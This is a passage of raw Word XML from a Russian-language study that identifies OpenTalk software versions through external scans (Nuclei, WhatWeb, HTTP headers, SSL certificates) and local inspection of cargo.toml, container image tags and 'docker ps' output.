        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1300BC87" w14:textId="4A0E710B" w:rsidR="003E531F" w:rsidRDefault="000F2390" w:rsidP="003E531F">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6250D0A6" wp14:editId="7A347D85">
            <wp:extent cx="5397696" cy="1582153"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="30403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696" cy="158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D3F9E" w14:textId="3B508F97" w:rsidR="003E531F" w:rsidRDefault="003E531F" w:rsidP="003E531F">
      <w:pPr>
        <w:pStyle w:val="18"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Ref234280606"/>
      <w:r>
        <w:t xml:space="preserve">Заголовок </w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="001211A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>-запроса</w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="00495F80">
        <w:t>»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="16D27E37" w14:textId="6B1CD095" w:rsidR="003E531F" w:rsidRDefault="000F2390" w:rsidP="003E531F">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56A8803C" wp14:editId="2A8CE4DB">
            <wp:extent cx="5419521" cy="3189931"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10140255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521" cy="318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C6AB" w14:textId="1CA17172" w:rsidR="003E531F" w:rsidRDefault="003E531F" w:rsidP="003E531F">
      <w:pPr>
        <w:pStyle w:val="18"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Ref234280593"/>
      <w:r>
        <w:t xml:space="preserve">Сканирование </w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="001211A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nuclei</w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="00495F80">
        <w:t>»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="66138F05" w14:textId="4143BCD9" w:rsidR="003E531F" w:rsidRDefault="000F2390" w:rsidP="003E531F">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A1116BF" wp14:editId="246BC3BC">
            <wp:extent cx="5433730" cy="363178"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13453279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359" cy="37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E955" w14:textId="1AC92148" w:rsidR="00CE1680" w:rsidRPr="00CE1680" w:rsidRDefault="003E531F" w:rsidP="003E531F">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:sectPr w:rsidR="00CE1680" w:rsidRPr="00CE1680" w:rsidSect="000F2390">
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="851" w:bottom="851" w:left="1701" w:header="567" w:footer="340" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Ref234280583"/>
      <w:r>
        <w:t xml:space="preserve">Сканирование </w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="001211A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A505E" w:rsidRPr="00495F80">
        <w:t>»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="56C7013A" w14:textId="76F0BB59" w:rsidR="00CE1680" w:rsidRPr="006F72DC" w:rsidRDefault="00CE1680" w:rsidP="004479D8">
      <w:pPr>
        <w:pStyle w:val="1f1"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33949F6D" w14:textId="0441DED1" w:rsidR="00282A3D" w:rsidRPr="00282A3D" w:rsidRDefault="00282A3D" w:rsidP="004479D8">
      <w:pPr>
        <w:pStyle w:val="1f1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Внутренние микросервисы не определить </w:t>
      </w:r>
      <w:r w:rsidR="006F72DC">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>за пределами локальной сети</w:t>
      </w:r>
      <w:r>
        <w:t>. А</w:t>
      </w:r>
      <w:r w:rsidRPr="00282A3D">
        <w:t>ктивная идентификация выявляет компоненты внешнего периметра</w:t>
      </w:r>
      <w:r w:rsidR="003E531F" w:rsidRPr="003E531F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A5828">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:instrText xml:space="preserve"> REF _Ref234280583 \r \h \</w:instrText>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>рисунок</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:t xml:space="preserve"> 1.4</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:t xml:space="preserve"> и внутренние компоненты по </w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="009A505E">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="009A505E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:t>сертификатам</w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="00495F80">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:instrText xml:space="preserve"> REF _Ref234280593 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="009A505E">
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>рисунок</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:t xml:space="preserve"> 1.3</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00282A3D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:t>Точные в</w:t>
      </w:r>
      <w:r w:rsidRPr="00282A3D">
        <w:t>ерсии внутренних служб внешним сканированием определить невозможно</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:t xml:space="preserve">, косвенное совпадение выявлено у </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B5B72" w:rsidRPr="001F04CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="003E531F">
        <w:t>при</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:t xml:space="preserve"> помощи анализа </w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="009A505E">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="009A505E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:t>заголовка</w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="00495F80">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:instrText xml:space="preserve"> REF _Ref234280606 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="009A505E">
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>рисунок</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:t xml:space="preserve"> 1.2</w:t>
      </w:r>
      <w:r w:rsidR="009A505E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00282A3D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE00E84" w14:textId="6CAD6594" w:rsidR="0075743D" w:rsidRDefault="0075743D" w:rsidP="0075743D">
      <w:pPr>
        <w:pStyle w:val="130"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Локальное выявление</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4809AFD4" w14:textId="77777777" w:rsidR="009A505E" w:rsidRDefault="009A505E" w:rsidP="009A505E">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76ED05DC" w14:textId="2624C43C" w:rsidR="009A505E" w:rsidRPr="009A505E" w:rsidRDefault="009A505E" w:rsidP="009A505E">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:sectPr w:rsidR="009A505E" w:rsidRPr="009A505E" w:rsidSect="009A505E">
          <w:headerReference w:type="default" r:id="rId14"/>
          <w:footerReference w:type="default" r:id="rId15"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="851" w:bottom="851" w:left="1701" w:header="567" w:footer="340" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00287A86">
        <w:t>В рамках исследования</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> было</w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:t xml:space="preserve"> выполнен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">о локальное выявление </w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>версии ПО.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Весь процесс проходил на стороне сервера </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>WSL</w:t>
      </w:r>
      <w:r w:rsidRPr="009A505E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">так же использовалось </w:t>
      </w:r>
      <w:r w:rsidRPr="009A505E">
        <w:t xml:space="preserve">непосредственное изучение </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">документации и файлов ПО </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Результаты представлены в</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003A5828">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>REF</w:instrText>
      </w:r>
      <w:r w:rsidRPr="003A5828">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> _</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>Ref</w:instrText>
      </w:r>
      <w:r w:rsidRPr="003A5828">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>234281042 \</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>r</w:instrText>
      </w:r>
      <w:r w:rsidRPr="003A5828">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>h</w:instrText>
      </w:r>
      <w:r w:rsidRPr="003A5828">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">таблице </w:t>
      </w:r>
      <w:r w:rsidRPr="003A5828">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84F663" w14:textId="77777777" w:rsidR="009A505E" w:rsidRPr="009A505E" w:rsidRDefault="009A505E" w:rsidP="009A505E">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF52AE9" w14:textId="3318B10D" w:rsidR="008A54AF" w:rsidRPr="004A7A62" w:rsidRDefault="008A54AF" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Ref234281042"/>
      <w:r w:rsidRPr="004A7A62">
        <w:t xml:space="preserve">– Перечень признаков идентификации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A7A62">
        <w:t xml:space="preserve"> посредством </w:t>
      </w:r>
      <w:r w:rsidR="00EA0F3B" w:rsidRPr="004A7A62">
        <w:t>анализа программных компонентов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ac"/>
        <w:tblW w:w="5155" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="663"/>
        <w:gridCol w:w="5353"/>
        <w:gridCol w:w="1774"/>
        <w:gridCol w:w="1844"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA0F3B" w:rsidRPr="001E10ED" w14:paraId="7E9F28C5" w14:textId="77777777" w:rsidTr="004A7A62">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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C1803" w14:textId="77777777" w:rsidR="00EA0F3B" w:rsidRPr="00C82B97" w:rsidRDefault="00EA0F3B" w:rsidP="004B22D3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№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8D53B" w14:textId="77777777" w:rsidR="00EA0F3B" w:rsidRPr="00C82B97" w:rsidRDefault="00EA0F3B" w:rsidP="004B22D3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Признак идентификации</w:t>
            </w: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91460" w14:textId="77777777" w:rsidR="00EA0F3B" w:rsidRPr="00C82B97" w:rsidRDefault="00EA0F3B" w:rsidP="004B22D3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Возможность выявления версии</w:t>
            </w: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F557B" w14:textId="77777777" w:rsidR="00EA0F3B" w:rsidRPr="00C82B97" w:rsidRDefault="00EA0F3B" w:rsidP="004B22D3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Комментарий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0F3B" w:rsidRPr="001E10ED" w14:paraId="49E40ABC" w14:textId="77777777" w:rsidTr="004A7A62">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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C0CA5" w14:textId="77777777" w:rsidR="00EA0F3B" w:rsidRPr="001E10ED" w:rsidRDefault="00EA0F3B" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>1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7D1E0" w14:textId="6CFC7990" w:rsidR="005E205E" w:rsidRPr="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="005E205E" w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>version = "0.33.0", %server%/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005E205E" w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>opentalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005E205E" w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/controller/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005E205E" w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cargo.toml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B165BFA" w14:textId="2CD07CC7" w:rsidR="00EA0F3B" w:rsidRPr="004A7A62" w:rsidRDefault="005E205E" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>registry.opencode.de/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>opentalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>controller:v</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0.33.5</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="089592DF" w14:textId="77777777" w:rsidR="005E205E" w:rsidRPr="007E74C8" w:rsidRDefault="005E205E" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66E974C9" w14:textId="1EA22894" w:rsidR="00EA0F3B" w:rsidRPr="007E74C8" w:rsidRDefault="00EA0F3B" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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2E2B" w14:textId="5D841003" w:rsidR="00EA0F3B" w:rsidRPr="001E10ED" w:rsidRDefault="005E205E" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">Версия ПО </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t>0.33.0</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:br/>
              <w:t xml:space="preserve">Выявляется в конфиге </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001E10ED">
              <w:t>cargo.toml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="004A7A62" w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="001E10ED">
              <w:t xml:space="preserve">, так же по запросу </w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="004A7A62">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B72">
              <w:rPr>
                <w:rStyle w:val="1fa"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:r w:rsidR="004A7A62" w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w: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92E5A" w14:textId="75C8FB75" w:rsidR="00EA0F3B" w:rsidRPr="001E10ED" w:rsidRDefault="005E205E" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>Должен быть доступ к серверу и к файлам сервера</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA0F3B" w:rsidRPr="001E10ED" w14:paraId="758B457D" w14:textId="77777777" w:rsidTr="004A7A62">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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B88B" w14:textId="3A63A1C1" w:rsidR="00EA0F3B" w:rsidRPr="001E10ED" w:rsidRDefault="005E205E" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E10ED">
              <w:t>2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5702" w14:textId="6FF3B964" w:rsidR="00543FA1" w:rsidRPr="007E74C8" w:rsidRDefault="004A7A62" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00C54DEE" w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Postgres</w:t>
            </w:r>
            <w:r w:rsidR="00543FA1" w:rsidRPr="007E74C8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:17.7 opentalk-postgres-kc-1</w:t>
            </w:r>
            <w:r w:rsidRPr="004A7A62">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
